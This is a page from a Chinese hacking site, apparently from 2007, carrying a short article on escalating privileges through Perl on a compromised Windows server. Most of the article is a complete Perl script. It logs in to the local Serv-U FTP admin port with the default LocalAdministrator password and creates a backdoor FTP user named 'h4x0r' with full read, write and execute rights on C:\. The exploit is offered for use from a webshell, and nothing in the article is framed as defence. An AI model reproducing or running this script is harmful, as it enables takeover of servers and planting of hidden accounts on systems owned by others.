我爱黑客网首页 设为首页
加入收藏
联系我们
 首 页  技术文章 下载中心 站长学院 交流论坛
 软件:
 文章:        教程:
 推荐: 我爱黑客网论坛
 
 
 
 
   
黑软: Q Q 软件 木马间谍 探嗅监听 溢出攻击 加密解密 漏洞扫描 脚本注入 远程控制 综合利用 聊天工具  
 
技术文章: 爱黑新闻 | 黑客攻防 | 网络技术 | 程序设计 | 系统操作 | 本站动态 | 业界动态 | 安全公告 | 病毒公告 | 八卦黑客
 
 
您当前的位置:我爱黑客 -> 黑客攻防 -> 黑客入门 -> 文章内容  
栏目导航
· Q Q 攻防 · 黑客入门
· 攻防实战 · 安全初步
· 工具详解 · 黑客教程
· 漏洞研究 · 黑客编程
· 技术杂谈
热门文章
· 黑客高手必懂基础内容..
· 黑客高手必懂基础内容..
· 假作真时真亦假——“..
· 黑客高手必懂基础内容..
· 黑客高手必懂基础内容..
· 黑客高手必懂基础内容..
· IP地址攻击方式
· 新手入侵检测知识
· 全面分析黑客常用的九..
· 网吧必杀:如何进入网..
· 上网千万不要下载安装..
· 用GOOGLE你瞬间成为黑..
相关文章

· 低危不忘戒备:XP利..
· 可恶!维基百科竟被..
· BCB利用组件传送文件..
· 在C++Builder利用Ne..
· 利用堆栈来ping计算..
· 利用C++ Builder实现..
· 如何利用CB5.0 创建..
· C++ Builder中各种资..
· 如何利用C++ Builde..
· [图文] 利用C++ Buil..
查看更多与利用Perl提权相关内容

利用Perl提权
作者:幽火  来源:www.5ihack.com  发布时间:2007-1-1 3:43:46  发布人:ghostfire

减小字体 增大字体

我们除了利用Serv-u.exe和Serv-u.aspx提权
又多了个Perl提权!

前提:
服务器装了Perl,我知道,好多2003都装了,呵呵,如果你在目录没有可执行权限,但是可以调用cmdshell的话,那么你可以这样做:
你直接使用Perl
Perl的默认安装路径是:C:\Perl
然后使用:
perl 你的pl文件的路径。
在WEBSHELL中的路径是这样的:
C:\perl\bin\perl 你的pl文件的路径
代码如下:
#!/usr/bin/perluse IO::Socket;binmode(STDOUT);syswrite(STDOUT, "Content-type: text/html\r\n\r\n", 27);$addr = "127.0.0.1";$ftpport = 21;$adminport = 43958;$adminuser = "LocalAdministrator";$adminpass = '#l@$ak#.lk;0@P';$user = "h4x0r";$password = "123456";$homedir = 'C:\\';$dir = 'C:\\WINNT\\System32\\';use IO::Socket::INET;$sock = IO::Socket::INET->new("127.0.0.1:$adminport") || die "fail";print "TEST<br><br>";print $sock "USER $adminuser\r\n";sleep (1);print $sock "PASS $adminpass\r\n";sleep(1);print $sock "SITE MAINTENANCE\r\n";sleep(1);print $sock "-SETUSERSETUP\r\n";print $sock "-IP=".$addr."\r\n";print $sock "-PortNo=".$ftpport."\r\n";print $sock "-User=".$user."\r\n";print $sock "-Password=".$password."\r\n";print $sock "-HomeDir=".$homedir."\r\n";print $sock "-LoginMesFile=\r\n";print $sock "-Disable=0\r\n";print $sock "-RelPaths=0\r\n";print $sock "-NeedSecure=0\r\n";print $sock "-HideHidden=0\r\n";print $sock "-AlwaysAllowLogin=0\r\n";print $sock "-ChangePassword=1\r\n";print $sock "-QuotaEnable=0\r\n";print $sock "-MaxUsersLoginPerIP=-1\r\n";print $sock "-SpeedLimitUp=-1\r\n";print $sock "-SpeedLimitDown=-1\r\n";print $sock "-MaxNrUsers=-1\r\n";print $sock "-IdleTimeOut=600\r\n";print $sock "-SessionTimeOut=-1\r\n";print $sock "-Expire=0\r\n";print $sock "-RatioUp=1\r\n";print $sock "-RatioDown=1\r\n";print $sock "-RatiosCredit=0\r\n";print $sock "-QuotaCurrent=0\r\n";print $sock "-QuotaMaximum=0\r\n";print $sock "-Maintenance=System\r\n";print $sock "-PasswordType=Regular\r\n";print $sock "-Ratios=None\r\n";print $sock " Access=".$homedir."|RWAMELCDP\r\n";print $sock "QUIT\r\n";@ret=<$sock>;print "@ret"; close(STDERR);close(STDOUT);exit;

查看更多与利用Perl提权相关内容

[ ] [返回上一页] [打 印] [收 藏]
上一篇文章:
下一篇文章:
      mssql注射中多次调用参数导致多次echo的解决方法       台湾地震“扯断”互联网
∷相关文章评论∷   (评论内容只代表网友观点,与本站立场无关!) [发表评论]
 
 
 
 
晋ICP备05008232   维护网络安全、传播安全技术才是我们的目标! 
 
关于本站 - 网站帮助 - - 下载声明 - 友情连接 -网站地图